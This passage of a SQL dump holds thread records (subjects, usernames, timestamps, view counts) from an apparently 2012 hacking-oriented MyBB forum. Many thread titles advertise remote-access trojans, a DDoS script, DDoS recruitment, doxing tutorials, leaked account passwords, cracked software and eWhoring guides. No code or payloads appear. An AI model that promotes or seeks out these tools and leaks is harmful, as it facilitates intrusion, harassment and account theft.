`lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('777', '4', 'The Ultimatum has Arrived!', '0', '0', '0', '249', 'Ultimatum', '1349765088', '4018', '1349799585', 'R?????zo?', '62', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('778', '19', '[Junk]Gigbucks to Fiverr method', '0', '0', '0', '62', 'R?????zo?', '1349770109', '4022', '1349837710', 't3h jok3r', '1', '22', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('779', '61', 'Get everything for FREE', '0', '0', '0', '62', 'R?????zo?', '1349770474', '4023', '1349945607', 'R?????zo?', '62', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('780', '17', 'Ultimate eWhoring Guide ? Never Seen Before ? $800/week! ?', '0', '0', '0', '62', 'R?????zo?', '1349770825', '4024', '1350374634', 'R?????zo?', '62', '16', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('781', '61', '[LEAK] J0HNNYs ultimate Money Making Method $100-$200 daily!', '0', '0', '0', '62', 'R?????zo?', '1349771540', '4025', '1349771540', 'R?????zo?', '62', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('782', '7', 'We need to advertise!', '0', '0', '0', '222', 'Exposé', '1349810253', '4052', '1350003167', 't3h jok3r', '1', '25', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('783', '49', 'Enable who\'s viewing thread....', '0', '0', '0', '222', 'Exposé', '1349810641', '4054', '1349830062', 't3h jok3r', '1', '12', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('786', '64', 'Awesome FREE site for watching latest anime and cartoons', '0', '0', '0', '100', '??zg???g????61', '1349824590', '4087', '1349872911', '??zg???g????61', '100', '12', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('789', '19', '[Junk]ratters', '0', '0', '0', '203', 'NeonLights', '1349833034', '4106', '1350752043', 't3h jok3r', '1', '51', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('785', '49', 'Install Tapatalk?', '0', '0', '0', '222', 'Exposé', '1349813687', '4067', '1349846236', 'Exposé', '222', '21', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('788', '3', '4000 POSTS YEAH BABY!', '0', '0', '0', '1', 't3h jok3r', '1349829429', '4099', '1350225019', 'iTzIpod', '82', '81', '20', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('787', '75', 'Saints Row The Third Cheats + More!', '0', '0', '0', '194', 'Slender Man', '1349828988', '4097', '1350114181', 'XxTREYZxX', '257', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('791', '7', 'Are you a morning person?', '0', '0', '0', '205', 'mothered', '1349870340', '4134', '1349933392', '??????????¢™', '3', '19', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('790', '58', 'Unique - Recruitment', '0', '0', '0', '62', 'R?????zo?', '1349863144', '4126', '1350170152', 'iTzIpod', '82', '55', '14', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('794', '54', 'New XXX Porn Passwords: 10 Oct 2012', '0', '0', '0', '62', 'R?????zo?', '1349883791', '4152', '1349883791', 'R?????zo?', '62', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('792', '61', 'Unique - Rules [PLEASE READ]', '0', '0', '0', '62', 'R?????zo?', '1349871284', '4137', '1352589176', 'iTzIpod', '82', '35', '12', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('793', '9', 'How To Make $5+ A Hour | Even Your Grandma Can Do It', '0', '17', '0', '228', 'VirtualLegend', '1349876465', '4145', '1349884989', 'VirtualLegend', '228', '19', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('795', '15', 'GreameRAT 1.5', '0', '0', '0', '203', 'NeonLights', '1349886893', '4154', '1350752147', 't3h jok3r', '1', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('796', '15', 'CyberGate v1.18.0 Full Version Cracked', '0', '0', '0', '203', 'NeonLights', '1349886978', '4155', '1350752129', 't3h jok3r', '1', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('797', '15', 'DarkComet RAT v5.3.1', '0', '0', '0', '203', 'NeonLights', '1349887047', '4156', '1350752154', 't3h jok3r', '1', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('803', '4', 'bye LH fun knowing u', '0', '2', '0', '203', 'NeonLights', '1349919588', '4186', '1350093099', 'Apathy', '2', '81', '15', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('804', '42', 'Ninja caught in US Airport', '0', '0', '0', '10', 'swa4567', '1349923699', '4209', '1350098834', 'Triple H', '4', '22', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('807', '34', '[ Get ] Ninja Graphics Kit For Free Worth $40 | All Graphics you need | Giveaway !!!', '0', '17', '0', '228', 'VirtualLegend', '1349957220', '4238', '1349969812', 'BreShiE', '232', '32', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('815', '73', 'your favourite iOS games', '0', '0', '0', '62', 'R?????zo?', '1349983096', '4267', '1350152015', 'R?????zo?', '62', '12', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('805', '47', 'Win 5 likes on your youtube video', '0', '0', '0', '53', 'sirchamp', '1349948717', '4223', '1349948717', 'sirchamp', '53', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('806', '58', '[NEW] (Recruiting) DDoS\'ers - Join today', '0', '0', '0', '100', '??zg???g????61', '1350921780', '4225', '1350938583', 'iTzIpod', '82', '16', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('808', '54', 'Huge list of NETFLIX accounts', '0', '0', '0', '62', 'R?????zo?', '1349970474', '4256', '1349970474', 'R?????zo?', '62', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('816', '9', '| Do You Want To Get More Traffic | List of Traffic Exchange Sites |', '0', '17', '0', '228', 'VirtualLegend', '1349990491', '4276', '1350593906', 'XxTREYZxX', '257', '19', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('817', '7', 'Favorite Quote?', '0', '0', '0', '82', 'iTzIpod', '1349992473', '4281', '1350035048', 'sirchamp', '53', '14', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('809', '64', 'LIVE STREAM BASKETBALL / SOCCER/MMA/WWE/FOOTBALL/ESPN', '0', '0', '0', '62', 'R?????zo?', '1349971115', '4258', '1349971115', 'R?????zo?', '62', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('810', '64', 'Good website\'s for Movie\'s to Watch', '0', '0', '0', '62', 'R?????zo?', '1349971244', '4259', '1350031148', 'R?????zo?', '62', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('822', '47', 'Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '17', '0', '228', 'VirtualLegend', '1350029946', '4302', '1351112339', 'Apathy', '2', '103', '16', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('811', '17', '100+ Pictures of Same Brunette | E-Whore Pack', '0', '0', '0', '62', 'R?????zo?', '1349971538', '4260', '1349971538', 'R?????zo?', '62', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('812', '61', 'Skype resolvers [WEB BASED]', '0', '0', '0', '62', 'R?????zo?', '1349971694', '4261', '1352526024', 'p420', '9', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('813', '61', 'Ultimate Steam Cracking Pack', '0', '0', '0', '62', 'R?????zo?', '1349972205', '4262', '1349972205', 'R?????zo?', '62', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('814', '14', 'How to Get a Free VPN (Lifetime)', '0', '0', '0', '62', 'R?????zo?', '1349972400', '4263', '1349972400', 'R?????zo?', '62', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('819', '68', 'PHP DDoS Script', '0', '0', '0', '7', 'Romdu62', '1350005038', '4292', '1350249820', 'NXK', '61', '20', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('818', '61', 'Leak Ultimate In-Depth Doxing Tutorial', '0', '0', '0', '62', 'R?????zo?', '1349993473', '4283', '1349993473', 'R?????zo?', '62', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('820', '18', '[FREE]Youtube Bot - View increaser + 4,000 proxy list', '0', '0', '0', '7', 'Romdu62', '1350005599', '4293', '1350005599', 'Romdu62', '7', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('821', '28', 'What\'s on your mind or what are your future plans?', '0', '0', '0', '5', 'Timmy', '1350006694', '4294', '1350684664', 'Exposé', '222', '49', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('823', '8', 'Fifa 11 Soundtracks', '0', '10', '0', '228', 'VirtualLegend', '1350032389', '4306', '1350033148', 'R?????zo?', '62', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('824', '4', 'Glowing Here!', '0', '0', '0', '253', 'GlowingCapes', '1350035669', '4310', '1350099723', 'BreShiE', '232', '22', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('825', '8', 'Favorite Rappers?', '0', '0', '0', '253', 'GlowingCapes', '1350037699', '4320', '1350442310', 'Exposé', '222', '19', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('826', '7', 'L33T Hacking Tinychat Room', '0', '0', '0', '100', '??zg???g????61', '1350054899', '4325', '1350157315', 'iTzIpod', '82', '23', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('827', '76', 'Playstation names', '0', '0', '0', '254', 'Greed', '1350057570', '4326', '1350121424', 'XxTREYZxX', '257', '24', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('828', '71', 'Planetary Anhiliation', '0', '0', '0', '254', 'Greed', '1350058074', '4327', '1350114487', 'XxTREYZxX', '257', '7', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('829', '74', 'Adventure Quest Worlds', '0', '0', '0', '254', 'Greed', '1350058283', '4328', '1350399326', 'D?ea', '264', '114', '37', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('830', '8', 'Feathery wings - Voltaire', '0', '0', '0', '254', 'Greed', '1350058812', '4331', '1350058812', 'Greed', '254', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('831', '7', 'Join My GIVEAWAY', '0', '0', '0', '228', 'VirtualLegend', '1350064195', '4334', '1350064195', 'VirtualLegend', '228', '13', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('833', '3', 'New feature coming up!', '0', '0', '0', '1', 't3h jok3r', '1350099871', '4375', '1350164357', 'R?????zo?', '62', '37', '11', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('832', '25', '[News] Windows 8 security flaw', '0', '0', '0', '4', 'Triple H', '1350099105', '4370', '1350470741', 'mothered', '205', '16', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('834', '64', 'The Marine DVDrip', '0', '0', '0', '5', 'Timmy', '1350100210', '4377', '1351391417', 'p420', '9', '7', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('835', '24', 'Just purchased another Lappy', '0', '0', '0', '205', 'mothered', '1350101212', '4381', '1350268138', 'XxTREYZxX', '257', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('836', '30', 'Internet Download Manager [IDM] v6.12.22 + crack + skin', '0', '0', '0', '255', 'sbhshroy2', '1350101731', '4385', '1350201080', 't3h jok3r', '1', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('837', '54', '[13 October ]Brazzers,Bangbros,Mofos,Reality Kings....and many more.100 % working', '0', '0', '0', '255', 'sbhshroy2', '1350102258', '4387', '1350102258', 'sbhshroy2', '255', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, 